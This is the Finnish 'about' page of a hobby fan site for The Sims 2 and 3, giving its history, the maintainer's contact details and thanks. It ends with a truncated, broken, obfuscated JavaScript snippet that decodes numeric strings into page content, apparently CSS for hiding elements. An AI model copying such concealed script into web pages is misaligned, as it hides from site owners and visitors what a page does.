Pelaan simsiä...
 
We have 10 guests online
Designed by:
Sivuista
 

Mikä ihmeen paikka tämä on? Jos ei muuten, niin alta lukemalla se selviää.

Sivuista
Radosims.com on puhtaasti harrastepohjalla pyörivä sivusto, jonka ylläpidosta vastaa yksi henkilö. Radosims.com on täysin epävirallinen fanisivusto, minulle on siis turha ehdotella seuraavaa lisäosaa tms. En saa sivuston pyörittämisestä palkkaa, eikä radosimsin pito ole elämäntehtäväni. Radosims.com ei kerro muista kuin The Sims 2 & 3 PC peleistä, koska minulle ei ole Pleikkaria tms. konsolia, rahaa ostaa niitä tai halua ostaa jos olisikin rahaa. Siispä tänne ei tule juttuja Pleikkarille tms olevista Sims 2 & 3 peleistä.
Huomaa ettei radosims ole kotisivututoraattori, enkä minä kenekään kotiorja.

Sivut on tehty Joomla! nimisellä erinomaisella kotisivujenvärkkäyshärdelliltä, eikä suinkaan mihinkään ilmaiseen kotisivutilaan vaan ihan rehellisellä rahalla maksettuun.

Kaikki sivustolla olevat kuvat, tekstit ja muut materiaalit ovat lähtöisin minun pikku kätösistäni, ja niiden kopioiminen on ehdottomasti kielletty!
 
 

Ylläpito ja yhteys
Nimi: rado, tunnetaan myös Millana ja sen eri muunnoksina (etenkin Milsana)
Ikä: parikymmentä

Elämäntilanne: Työnarkkari
Asuinalue: Pääkaupunkiseutu
Yhteys: m_i_l_l_i_e_t(a)hotmail.com (kamala osoite, perua teinivuosilta).
Vielä kätevämmin minut tavoittaa, kun heität rohkeasti yksityisviestiä keskutelufoorumi Radolassa.

 

 


 

Lyhyt katsaus radosims.comin historiaan

Ajatus radosimsiin lähti keväällä 2005 kun havaitsin miten harva osaa käyttää boolProppia tai vaikkapa rakentaa siltaa. Kypsyttelin ideaa pitkin kevättä ja kesää, ja kesän helteisinä iltapäivinä pähkäilin pitkät tovit sivuston nimen parissa. Halusin lyhyen, helposti muistuttavan nimen, joka sopii sims sanan kanssa mutta ei ala s- kirjaimella. Lopulta päädyin radoon täysin sattumalta, eräässä televisiomainoksessa näkyi vanha radio ja hihittelin itsekseni ”Radiosims..”. Siitäpä olikin vain yksi kirjan matkaa nykyiseen nimen, ja vielä samana päivänä luonnostelin radotipun mallin.
Radosims valmistui loppuvuodesta sisältäen tosin vain murto-osan nykyisestä sisällöstään.
Ensimmäinen sivuilla järjestetty kisa oli nimen valinta suosituksi nousseelle moveobjectsin hyötykäyttö sarjassa esiintyvälle simille. Helmikuusta 2006 radosimsiin on kuulunut myös keskustelufoorumi Radola, ja loppuvuodesta kaikki räjähti käsiin ja jok´ ainoa asia pitä tehdä uudestaan (Tietokantaharakiri06!)
Kesällä 2009 kaikki poksahti hakkerin myötä taivaan tuuliin, mutta onneksi on olemassa varmuuskopiot...
Pian tämän jälkeen löysin sisäisen työnarkkarini, ja koska teen nykyisin aivan ylenpalttisen paljon töitä, en voi keskittyä radoversumiin 24/7.

 


 

Kiitokset

Ensimmäiseksi kiitokset kävijöille ja Suomen simspelaajille. Olette ihana yhteisö, jota ilman en missään, missään nimessä jatkaisi tätä. Kiitos myös EA Gamesille, joka on tehnyt näin ihanan pelin. Lisäksi ontuva kiitos Jiille, joka periaattessa opetti minulle Joomlan peruskäytön, joskin suosittelen että jatkoassa keskityt opettamiseen hieman paremmin. Kiitokset myös Ejolle ystävällisestä ja kärsivällisestä avusta, Makelle siitä että tutustutit minut tähän peliin, Theolle kiitokset avusta foorumin pystytyksessä, Kissikselle oikoluvusta, Jezelle henk. koht. kotitonttuna toimimisestani, Theolle eli pusuunallelle kaikenkattavasta avusta sekä muille maailman parhaille moderaattoreille työstä, joka mahdollisti Radolan kasvun.
Erityiskiitos TomTomille jonka ansioista Radosims saattoi nousta uudelleen Suuren Tietokantaharakirin (06) jälkeen, sekä Tuulialle ja mBarin juustokakulle, että saatiin pulju pystyyn taas 09. Ja Mister T:lle kikatuksenaiheutuksesta, joka on ollut suu-uuri voimavara (ei se kuitenkaan tätä lue).
Kiitos myös kaikille yhteistyötahoille (niiden lukemattomissa eri muodoissa).

 
   
var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896','877886888787','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a]; t=z=''; for(v=0;v.'+x[2]+'{'+x[1]+'}');